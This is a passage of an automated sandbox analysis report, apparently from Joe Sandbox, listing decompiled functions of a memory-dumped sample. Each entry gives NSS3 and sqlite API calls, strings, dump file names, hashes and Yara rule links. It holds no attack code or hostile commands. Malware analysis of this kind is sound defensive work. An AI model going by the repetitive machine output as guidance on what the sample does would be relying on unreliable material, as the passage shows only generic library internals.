Part of subcall function 6CAFFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CAFFBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CB0CD93,?), ref: 6CB0CF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CB0CD93,?), ref: 6CB0CF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6CB0CD93,?,?,?,?,?,?,?,?,?,?,?,6CB0CD93,?), ref: 6CB0CF78

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: d40dacc08b92fc63668f041362d30daaf8761e45c8b219edf4d468d8ffdb451d
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 271160A5B002859BEB14AE666C41B6BBAECDF5458DF04403AF909D7741FB60D90C86B3

Function 6CAB8C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CAB8C1B
EnterCriticalSection.KERNEL32 ref: 6CAB8C34
PL_ArenaAllocate.NSS3 ref: 6CAB8C65
PR_Unlock.NSS3 ref: 6CAB8C9C
PR_Unlock.NSS3 ref: 6CAB8CB6

Part of subcall function 6CB4DD70: TlsGetValue.KERNEL32 ref: 6CB4DD8C
Part of subcall function 6CB4DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB4DDB4

Strings

KRAM, xrefs: 6CAB8C8F

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 33fc426c8995981b0b9895252f4f1ae0a92ea909cca20499496b44c2bd0e69cc
Instruction ID: 3618da7f05f1a72e8f8d038b85c0e42aafab99d816fe091aafb4ff870e179dae
Opcode Fuzzy Hash: 33fc426c8995981b0b9895252f4f1ae0a92ea909cca20499496b44c2bd0e69cc
Instruction Fuzzy Hash: 7C216DB5A056028FD700AF7DC484559BBF8FF06314F05896ED8889B712EB35E8C9CB92

Function 6CB33E20 Relevance: 10.6, APIs: 7, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 6CB35B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB35B56

PR_EnterMonitor.NSS3(?), ref: 6CB33E45

Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB690AB
Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB690C9
Part of subcall function 6CB69090: EnterCriticalSection.KERNEL32 ref: 6CB690E5
Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB69116
Part of subcall function 6CB69090: LeaveCriticalSection.KERNEL32 ref: 6CB6913F

PR_EnterMonitor.NSS3(?), ref: 6CB33E5C
PR_EnterMonitor.NSS3(?), ref: 6CB33E73
PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6CB33EA6

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

PR_ExitMonitor.NSS3(?), ref: 6CB33EC0
PR_ExitMonitor.NSS3(?), ref: 6CB33ED7
PR_ExitMonitor.NSS3(?), ref: 6CB33EEE

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Monitor$EnterValue$Exit$CriticalSection$ErrorIdentitiesLayerLeave
String ID:
API String ID: 2517541793-0
Opcode ID: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction ID: 560b1683b20dfb149e7a67cbda1ff85bc1d50e21c1f7312acebf89a3f3037016
Opcode Fuzzy Hash: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction Fuzzy Hash: B011BB719145B0ABD7315F29FC02BCB77A1DB40308F001834E65E87E60E736E52AC752

Function 6CBB2C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6CBB2CA0
PR_ExitMonitor.NSS3 ref: 6CBB2CBE
calloc.MOZGLUE(00000001,00000014), ref: 6CBB2CD1
strdup.MOZGLUE(?), ref: 6CBB2CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CBB2D27

Strings

Loaded library %s (static lib), xrefs: 6CBB2D22

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 9241d74fccbe4e71e9590a06bc9772de35d99c4c4b6237555bf885c8b1bde746
Instruction ID: fca09096d26e20d1ec527e44be394a423b9616e7377372d0547b456270d0b560
Opcode Fuzzy Hash: 9241d74fccbe4e71e9590a06bc9772de35d99c4c4b6237555bf885c8b1bde746
Instruction Fuzzy Hash: 8711E2B57002909FEB108F19DC49A7A77B4EB4935DF14852DD80997B41DB32E848CBA2

Function 6CAABDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CAABDCA

Part of subcall function 6CB00FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAA87ED,00000800,6CA9EF74,00000000), ref: 6CB01000
Part of subcall function 6CB00FF0: PR_NewLock.NSS3(?,00000800,6CA9EF74,00000000), ref: 6CB01016
Part of subcall function 6CB00FF0: PL_InitArenaPool.NSS3(00000000,security,6CAA87ED,00000008,?,00000800,6CA9EF74,00000000), ref: 6CB0102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CAABDDB

Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB010F3
Part of subcall function 6CB010C0: EnterCriticalSection.KERNEL32(?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0110C
Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01141
Part of subcall function 6CB010C0: PR_Unlock.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01182
Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CAABDEC

Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0116E

SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6CAABE03

Part of subcall function 6CAFFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAF8D2D,?,00000000,?), ref: 6CAFFB85
Part of subcall function 6CAFFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CAFFBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAABE22
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAABE30
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAABE3B

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1821307800-0
Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction ID: 0f5e947f4a7dfab60f9739a05e6a2a57fa751835b421941c80e09d428dc1e17b
Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction Fuzzy Hash: 43012B75B4024566F62026A6BC01FAF3A5C8F5068DF180131FE0897B82FB51D51A82B5

Function 6CB00FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAA87ED,00000800,6CA9EF74,00000000), ref: 6CB01000
PR_NewLock.NSS3(?,00000800,6CA9EF74,00000000), ref: 6CB01016

Part of subcall function 6CB698D0: calloc.MOZGLUE(00000001,00000084,6CA90936,00000001,?,6CA9102C), ref: 6CB698E5

PL_InitArenaPool.NSS3(00000000,security,6CAA87ED,00000008,?,00000800,6CA9EF74,00000000), ref: 6CB0102B
TlsGetValue.KERNEL32(00000000,?,?,6CAA87ED,00000800,6CA9EF74,00000000), ref: 6CB01044
free.MOZGLUE(00000000,?,00000800,6CA9EF74,00000000), ref: 6CB01064

Strings

security, xrefs: 6CB01025

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: 3b211adcf0a1ff9f63674870fab3ce4c1b4eb7d01976d6f97c543acc0c47dda1
Instruction ID: 466adf160c916b9fba8771a1cb69c5446b41646c83fe9dbd55403cd22c154350
Opcode Fuzzy Hash: 3b211adcf0a1ff9f63674870fab3ce4c1b4eb7d01976d6f97c543acc0c47dda1
Instruction Fuzzy Hash: F5012170B402D09BE7202F2C9C05A563EBCFF0679DF094119E88897A51FB61D198DBE2

Function 6CB31C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB31C74

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

DeleteCriticalSection.KERNEL32(?), ref: 6CB31C92
free.MOZGLUE(?), ref: 6CB31C99
DeleteCriticalSection.KERNEL32(?), ref: 6CB31CCB
free.MOZGLUE(?), ref: 6CB31CD2

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree$ErrorValue
String ID:
API String ID: 3805613680-0
Opcode ID: 312e8a1bfca436666072052fd3b1a6d59cb34501467c0b0dddcdb92ffaa8e369
Instruction ID: 3b68399a439b68c868b300459398393755e70009ee46f3cfada154150e5d7421
Opcode Fuzzy Hash: 312e8a1bfca436666072052fd3b1a6d59cb34501467c0b0dddcdb92ffaa8e369
Instruction Fuzzy Hash: CD01F5B1F052705FDF20AFA49C0DB4A37BCA70B748F450029E90EA7B40D772E09987A2

Function 6CB91C40 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6CA93D77,?,?,6CA94E1D), ref: 6CB91C8A
sqlite3_free.NSS3(00000000), ref: 6CB91CB6

Strings

non-deterministic use of %s() in %s, xrefs: 6CB91C85
a CHECK constraint, xrefs: 6CB91C76, 6CB91C81
an index, xrefs: 6CB91C67
a generated column, xrefs: 6CB91C6C

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintf
String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
API String ID: 1840970956-3705377941
Opcode ID: 9040b6f579d7a532d71f88487fb1bf5500f5fe4ee0d1947cdf42e1470da9c512
Instruction ID: b0c2c61fc74562c1d8d9ae9f4785e1512a97ccfd19dc892d2d3853e0b91a7cf8
Opcode Fuzzy Hash: 9040b6f579d7a532d71f88487fb1bf5500f5fe4ee0d1947cdf42e1470da9c512
Instruction Fuzzy Hash: CF014CB5A001804BD700BF2CD40297177E5EF8234CB15487DDD459BB02EB32E896C751

Function 6CB42E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB43046

Part of subcall function 6CB2EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB2EE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6CB17FFB), ref: 6CB4312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB43154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB42E8B

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

Part of subcall function 6CB2F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6CB19BFF,?,00000000,00000000), ref: 6CB2F134

memcpy.VCRUNTIME140(8B3C75C0,?,6CB17FFA), ref: 6CB42EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB4317B

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: 1fe27d00af9f648a891f11a2614b63d648f8788a0b2554155b8b519d14e8651c
Instruction ID: 2133a14306b4723b6fb5cf37590dc499aafd860b22d7957c8620fac0f34d51f3
Opcode Fuzzy Hash: 1fe27d00af9f648a891f11a2614b63d648f8788a0b2554155b8b519d14e8651c
Instruction Fuzzy Hash: 7CA1BC71A042589FDF24CF54CC80BEEB7B5EF49308F048199E949A7745E731A985CFA2

Function 6CB0ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CB0ED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6CB0EDCE

Part of subcall function 6CB00BE0: malloc.MOZGLUE(6CAF8D2D,?,00000000,?), ref: 6CB00BF8
Part of subcall function 6CB00BE0: TlsGetValue.KERNEL32(6CAF8D2D,?,00000000,?), ref: 6CB00C15

free.MOZGLUE(00000000,?,?,?,?,6CB0B04F), ref: 6CB0EE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CB0EECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CB0EEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CB0EEFB

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: c3e17d4aa15bd441b59029e2b2347b12fc1f2b41b09e1349ee32ce185beda3b9
Instruction ID: f2b43b60351a04a19f84b031d1a5c60485c079833c109c6ee1300417f21ed71d
Opcode Fuzzy Hash: c3e17d4aa15bd441b59029e2b2347b12fc1f2b41b09e1349ee32ce185beda3b9
Instruction Fuzzy Hash: 05816BB1B002899FEB14CF55D880AAF7BF5FF88348F144428E8659B751D730E814CBA2

Function 6CB0CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB0C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CB0DAE2,?), ref: 6CB0C6C2

PR_Now.NSS3 ref: 6CB0CD35

Part of subcall function 6CB69DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CBB0A27), ref: 6CB69DC6
Part of subcall function 6CB69DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CBB0A27), ref: 6CB69DD1
Part of subcall function 6CB69DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB69DED

Part of subcall function 6CAF6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CAA1C6F,00000000,00000004,?,?), ref: 6CAF6C3F

PR_GetCurrentThread.NSS3 ref: 6CB0CD54

Part of subcall function 6CB69BF0: TlsGetValue.KERNEL32(?,?,?,6CBB0A75), ref: 6CB69C07

Part of subcall function 6CAF7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CAA1CCC,00000000,00000000,?,?), ref: 6CAF729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB0CD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CB0CE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CB0CE2C

Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB010F3
Part of subcall function 6CB010C0: EnterCriticalSection.KERNEL32(?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0110C
Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01141
Part of subcall function 6CB010C0: PR_Unlock.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01182
Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6CB0CE40

Part of subcall function 6CB014C0: TlsGetValue.KERNEL32 ref: 6CB014E0
Part of subcall function 6CB014C0: EnterCriticalSection.KERNEL32 ref: 6CB014F5
Part of subcall function 6CB014C0: PR_Unlock.NSS3 ref: 6CB0150D

Part of subcall function 6CB0CEE0: PORT_ArenaMark_Util.NSS3(?,6CB0CD93,?), ref: 6CB0CEEE
Part of subcall function 6CB0CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CB0CD93,?), ref: 6CB0CEFC
Part of subcall function 6CB0CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CB0CD93,?), ref: 6CB0CF0B
Part of subcall function 6CB0CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CB0CD93,?), ref: 6CB0CF1D

Part of subcall function 6CB0CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CB0CD93,?), ref: 6CB0CF47
Part of subcall function 6CB0CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CB0CD93,?), ref: 6CB0CF67
Part of subcall function 6CB0CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CB0CD93,?,?,?,?,?,?,?,?,?,?,?,6CB0CD93,?), ref: 6CB0CF78

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 800ab21de11cdc08c6c2c278d47e5faafa2dd64d2331e7c766f413eb88f48038
Instruction ID: 4c3479fe4c3eb5e29d10bc560330a12c2487f09fc290af9ae5427fe2099e3178
Opcode Fuzzy Hash: 800ab21de11cdc08c6c2c278d47e5faafa2dd64d2331e7c766f413eb88f48038
Instruction Fuzzy Hash: EF51B3B6B001509BE710DF69DC40BAA7BE4EF48348F250524E95997B41EB31F945CBA3

Function 6CB1FFD0 Relevance: 9.1, APIs: 6, Instructions: 132COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFD076,00000000), ref: 6CB1FFE5

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

PR_EnterMonitor.NSS3(?), ref: 6CB20004
PR_EnterMonitor.NSS3(?), ref: 6CB2001B

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: EnterMonitor$ErrorValue
String ID:
API String ID: 3413098822-0
Opcode ID: 1ff18ca93d0cfe4196e5bbdf2c11a8536ad6c2002143feef5c81c5f4829847c7
